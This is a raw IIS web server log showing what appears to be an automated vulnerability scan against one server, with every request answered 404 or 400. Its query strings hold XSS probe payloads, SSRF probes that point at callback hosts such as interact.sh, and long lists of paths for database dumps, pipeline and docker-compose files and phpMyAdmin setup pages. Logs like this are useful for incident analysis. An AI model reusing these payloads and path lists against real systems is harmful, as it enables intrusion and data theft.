#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 12:44:06 103.153.214.94 GET /wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 29
2023-07-06 12:47:54 103.153.214.94 GET /libraries/joomla/database/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 26
2023-07-06 12:49:49 103.153.214.94 POST /seo/seopanel/login.php sec=forgot 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 28
2023-07-06 12:52:09 103.153.214.94 GET /updating.jsp url=https://interact.sh/ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 29
2023-07-06 13:05:03 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 28
2023-07-06 13:05:03 103.153.214.94 GET /sqlite/ - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 24
2023-07-06 13:05:03 103.153.214.94 GET /sqlitemanager/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 25
2023-07-06 13:07:22 103.153.214.94 GET / lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&amp;p=1 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 28
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 13:29:08
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 13:29:08 103.153.214.94 GET /.vscode/ - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 28
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 13:51:28
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 13:51:28 103.153.214.94 GET /apps - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 31
2023-07-06 13:56:36 103.153.214.94 GET /wp-admin/admin-ajax.php action=heateor_sss_sharing_count&amp;urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E] 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 28
2023-07-06 13:57:36 103.153.214.94 GET /visualrf/group_list.xml aps=1&amp;end=500&amp;match&amp;start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 25
2023-07-06 13:58:30 103.153.214.94 GET /log type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 26
2023-07-06 14:00:30 103.153.214.94 POST /wp-json/visualizer/v1/update-chart - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 26
2023-07-06 14:04:50 103.153.214.94 GET /search/ q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 27
2023-07-06 14:06:39 103.153.214.94 GET /docker-compose.yml - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 27
2023-07-06 14:06:39 103.153.214.94 GET /docker-compose.prod.yml - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 25
2023-07-06 14:06:39 103.153.214.94 GET /docker-compose.production.yml - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 24
2023-07-06 14:06:39 103.153.214.94 GET /docker-compose.staging.yml - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 24
2023-07-06 14:06:39 103.153.214.94 GET /docker-compose.dev.yml - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 23
2023-07-06 14:06:39 103.153.214.94 GET /docker-compose-dev.yml - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 22
2023-07-06 14:06:39 103.153.214.94 GET /docker-compose.override.yml - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 25
2023-07-06 14:08:06 103.153.214.94 GET /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 26
2023-07-06 14:08:22 103.153.214.94 GET /wp-content/plugins/jh-404-logger/readme.txt - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 29
2023-07-06 14:22:03 103.153.214.94 GET / rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 25
2023-07-06 14:23:37 103.153.214.94 GET /giveaway/mygiveaways/ share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 29
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 14:42:57
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 14:42:56 103.153.214.94 GET /wp-content/plugins/e-search/tmpl/date_select.php date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 49
2023-07-06 14:46:28 103.153.214.94 GET /home/get_products search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 29
2023-07-06 14:52:14 103.153.214.94 GET /pmb/admin/convert/export_z3950.php command=search&amp;query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 28
2023-07-06 15:07:10 103.153.214.94 GET /shib_logout.php action=logout&amp;return=https://example.com 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 26
2023-07-06 15:07:10 103.153.214.94 GET /ilias/shib_logout.php action=logout&amp;return=https://example.com 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 23
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 15:25:12
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 15:25:12 103.153.214.94 GET /wp-content/plugins/clickdesk-live-support-chat/clickdesk.php cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 28
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 15:43:04
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 15:43:04 103.153.214.94 GET /tiki/tiki-ajax_services.php action=list&amp;controller=comment&amp;objectId=&lt;script&gt;alert(document.domain)&lt;/script&gt;&amp;type=wiki+page 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 30
2023-07-06 15:43:04 103.153.214.94 GET /tiki-ajax_services.php action=list&amp;controller=comment&amp;objectId=&lt;script&gt;alert(document.domain)&lt;/script&gt;&amp;type=wiki+page 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 26
2023-07-06 15:46:32 103.153.214.94 GET /card_scan.php CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&amp;No=0000&amp;ReaderNo=0000 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 31
2023-07-06 15:51:08 103.153.214.94 GET /login.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 28
2023-07-06 15:51:57 103.153.214.94 GET /plugin/sms5/ajax.sms_emoticon.php arr_ajax_msg=gnuboard&lt;svg+onload=alert(document.domain)&gt; 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 29
2023-07-06 15:52:23 103.153.214.94 GET /remotereporter/load_logfiles.php server=018192&amp;url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 24
2023-07-06 16:00:35 103.153.214.94 GET /wp-content/plugins/wpmudev-updates/keys/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 29
2023-07-06 16:11:48 103.153.214.94 GET /php/ssh_form.php hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 27
2023-07-06 16:14:08 103.153.214.94 GET /pages/ajax.render.php dashboard_id=1&amp;layout_class=DashboardLayoutOneCol&amp;operation=render_dashboard&amp;title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 27
2023-07-06 16:20:46 103.153.214.94 GET /admin/login/index.php - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 30
2023-07-06 16:22:06 103.153.214.94 GET /wp-admin/admin-ajax.php action=swpm_validate_email&amp;fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 27
2023-07-06 16:22:21 103.153.214.94 GET /gateway/routes - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 24
2023-07-06 16:22:21 103.153.214.94 GET /actuator/gateway/routes - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 23
2023-07-06 16:36:10 103.153.214.94 GET /111/rs:fit:400:400:0:0/plain/http:/ciio7miofm2mtabc1uagp615ksoto4b13.oast.online - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 400 0 0 32
2023-07-06 16:39:23 103.153.214.94 GET /cgi-bin/printenv.pl - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 30
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 17:16:24
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 17:16:24 103.153.214.94 GET /wp-json/wp/v2/users/ - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 31
2023-07-06 17:16:24 103.153.214.94 GET / rest_route=/wp/v2/users/ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 23
2023-07-06 17:17:09 103.153.214.94 GET /mod/jitsi/sessionpriv.php avatar=https%3A%2F%2Fbcvt.kontum.gov.vn:8172%2Fuser%2Fpix.php%2F498%2Ff1.jpg&amp;nom=test_user%27)%3balert(document.domain)%3b//&amp;ses=test_user&amp;t=1 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 29
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 17:38:59
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 17:38:59 103.153.214.94 GET /index.php toast=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 31
2023-07-06 17:41:14 103.153.214.94 GET /web/cgi-bin/hi3510/param.cgi cmd=setmobilesnapattr&amp;cururl=http%3A%2F%2Finteract.sh 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 31
2023-07-06 17:44:01 103.153.214.94 GET /index.php rest_route=/whm/v3/themesettings 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 36
2023-07-06 17:48:06 103.153.214.94 GET /1.sql - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 29
2023-07-06 17:48:06 103.153.214.94 GET /backup.sql - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 28
2023-07-06 17:48:08 103.153.214.94 GET /database.sql - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 28
2023-07-06 17:48:09 103.153.214.94 GET /data.sql - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 26
2023-07-06 17:48:10 103.153.214.94 GET /db_backup.sql - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 28
2023-07-06 17:48:10 103.153.214.94 GET /dbdump.sql - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 28
2023-07-06 17:48:12 103.153.214.94 GET /db.sql - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 26
2023-07-06 17:48:12 103.153.214.94 GET /dump.sql - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 29
2023-07-06 17:48:14 103.153.214.94 GET /bcvt.kontum.gov.vn:8172.sql - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 400 0 0 27
2023-07-06 17:48:15 103.153.214.94 GET /bcvt.kontum.gov.vn:8172_db.sql - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 400 0 0 28
2023-07-06 17:48:15 103.153.214.94 GET /localhost.sql - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 23
2023-07-06 17:48:17 103.153.214.94 GET /mysqldump.sql - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 23
2023-07-06 17:48:17 103.153.214.94 GET /mysql.sql - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 22
2023-07-06 17:48:19 103.153.214.94 GET /site.sql - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 22
2023-07-06 17:48:19 103.153.214.94 GET /sql.sql - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 24
2023-07-06 17:48:21 103.153.214.94 GET /temp.sql - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 23
2023-07-06 17:48:22 103.153.214.94 GET /translate.sql - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 24
2023-07-06 17:48:23 103.153.214.94 GET /users.sql - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 22
2023-07-06 17:48:23 103.153.214.94 GET /wp-content/uploads/dump.sql - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 23
2023-07-06 17:48:25 103.153.214.94 GET /wp-content/mysql.sql - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 26
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-07-06 18:06:07
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-07-06 18:06:07 103.153.214.94 GET /.azure-pipelines.yml - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 32
2023-07-06 18:06:07 103.153.214.94 GET /azure-pipelines.yml - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 28
2023-07-06 18:07:57 103.153.214.94 GET /t/index.php action[]=aaaa 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 30
2023-07-06 18:13:18 103.153.214.94 GET /mods/clansphere/lang_modvalidate.php language=language&amp;module=module%22&gt;&lt;/script&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt; 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 38
2023-07-06 18:22:18 103.153.214.94 GET /wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php source=1&amp;ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 37
2023-07-06 18:27:40 103.153.214.94 GET /Runtime/Data/ms_admin.php - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 39
2023-07-06 18:41:56 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 29
2023-07-06 18:41:56 103.153.214.94 GET /clusters/local - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 25
2023-07-06 18:45:22 103.153.214.94 GET /phpmyadmin/scripts/setup.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 37
2023-07-06 18:45:22 103.153.214.94 GET /phpMyAdmin/scripts/setup.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 27
2023-07-06 18:45:22 103.153.214.94 GET /_phpmyadmin/scripts/setup.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 27
2023-07-06 18:45:22 103.153.214.94 GET /forum/phpmyadmin/scripts/setup.php - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 39
2023-07-06 18:45:22 103.153.214.94 GET /php/phpmyadmin/scripts/setup.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 27
2023-07-06 18:45:22 103.153.214.94 GET /typo3/phpmyadmin/scripts/setup.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 31
2023-07-06 18:45:23 103.153.214.94 GET /web/phpmyadmin/scripts/setup.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 27
2023-07-06 18:45:23 103.153.214.94 GET /xampp/phpmyadmin/scripts/setup.php - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 27
